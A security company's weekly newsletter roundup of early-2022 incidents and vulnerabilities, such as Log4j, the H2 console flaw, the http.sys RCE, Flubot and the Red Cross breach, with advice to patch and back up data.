Welcome to #WakeUpWednesday. We want to make the Netherlands digitally safe and resilient. That is why Tesorion will now give you a short overview every Wednesday in a post about vulnerabilities or hacks that have received national or international attention. We want to wake up as many people as possible and make them aware of possible risks in the field of cyber security.
We will of course report directly on important vulnerabilities and options to mitigate them. Our #WakeUpWednesday is a kind of retrospective.
Data is valuable, also for cyber criminals. No organization is spared, as became apparent from the hack on the Red Cross. Data from more than 500,000, often vulnerable people, were stolen.
In addition, cyber criminals have managed to use more than 2,000 corporate email accounts in various spyware campaigns. Kaspersky’s investigations revealed that the spyware was distributed via an email attachment. If the employee opens the attachment and the spyware successfully infects the system, the username and password of the employee in question are sent to the cyber criminal. The attacker can gain access to the system with the stolen data and then further spread the spyware among the employee’s contacts.
Known vulnerabilities used by cyber criminals at a later date are not new. In early December, we warned about critical vulnerabilities in the SonicWall SMA 100 series. A warning was issued this week that these vulnerabilities are currently being actively exploited. There is no workaround available, the advice is to update the software as soon as possible.
Logging is important, for example, to find out how cyber criminals got in. Nevertheless, Cisco research shows that due to a lack of logging, the attack vector is unknown in most incidents. Where the attack vector is known, in most cases the cause appears to be phishing, or applications that are accessible via the internet. Train the cyber awareness of your employees and ensure that vulnerabilities in the software are fixed as soon as an update is available.
In the #WakeUpWednesday we regularly report incidents where there is a need and urgency around patching. Incidents are also regularly discussed where increasing awareness can help increase cyber security.
Over the past week, Apache Foundation, which includes management of Apache Log4j, OpenOffice and Apache web server, warned against the use of end-of-life software. As a result, users are still being attacked through old vulnerabilities in Apache software that is no longer supported and/or maintained.
Updates have also been released for the LUKS encryption software for Linux. Making backups and making sure that they cannot be changed afterwards is one of the basic measures within cybersecurity. The LUKS encryption software contained a critical vulnerability (CVE-2021-4122) that allowed decryption without entering the passphrase.
Due to the combination of a weak administrator password and the use of a weak encryption algorithm, private data of nearly 7 million end users of the Open Subtitles website has been stolen and made public. The email addresses have been added to the data leak search engine Have I Been Pwned.
The Log4j vulnerability has an impact on many systems. For example, the British health service warns against abuse of the vulnerability in VMware Horizon. The software uses Apache Tomcat which in turn uses Log4j. Despite the fact that VMware patches were released in December, attackers are actively looking for systems that are not yet equipped with the available patches.
A new vulnerability has been discovered affecting H2 database consoles. This vulnerability also exploits the remote loading of JNDI classes, the same source of the Log4Shell vulnerability. Because this H2 database engine is also widely used, just like with Log4j, the reach is large. The vulnerability (CVE-2021-42392) affects H2 database versions 1.1.100 to 2.0.204. The advice is to update to version 2.0.206 as soon as possible.
During the January patch Tuesday, Microsoft released patches for 96 new vulnerabilities. The most severe vulnerability is a remote code execution vulnerability in http.sys, registered as CVE-2022-21907. This vulnerability allows an unauthenticated attacker to execute code on an affected system by sending a specially crafted request or response. We advise to check if your products are listed and apply the required patches or workaround as soon as possible.
It is no surprise that cybercriminals are always looking for new methods to penetrate organizations. Nowadays, for example, USB sticks are sent that are very similar in terms of stick and packaging to those of reputable organizations. However, the USB sticks sent contain malware in order to start malicious actions.
The makers of Flubot malware, an Android trojan that targets financial data, have launched a number of new campaigns to spread their malware. Be alert for messages related to, for example: updating Adobe flash player, false notifications for software updates that go outside the playstore, messages about package deliveries, etc. Most characteristic is that these messages contain a link that cannot be traced back to the organization in question.
2022 is off to a good start, also in the field of cybersecurity. Google has released a security update for Chrome. Among other things, this new update resolves a critical vulnerability that could allow an attacker to execute arbitrary code on a user’s system without requiring further user action. Executing code naturally enables an attacker to install malware on your computer that can, for example, be used to steal credit card and login details.
Cyber criminals have carried out a supply chain attack on more than 100 companies by adding skimmer code to a video player of a cloud video hosting service. When an organization used the video player on, for example, a website, the malicious code was also added. As a result, the site was infected and credit card data could be stolen.
Cyber security has many aspects. One of the basic measures is to create and restore backups. Determining a backup strategy is therefore part of a business continuity plan. Therefore, make sure that you know how long your organization (part) may be unavailable (Recovery Time Objective) and how much data loss is acceptable (Recovery Point Objective). Test this process regularly to avoid unpleasant surprises. For example, in December Kyoto University lost 77TB of research data due to an error in its backup system.
Get to know what's going on! Subscribe now
Would you like to know about vulnerabilities, national or international hacks every Wednesday? Then subscribe to this newsletter.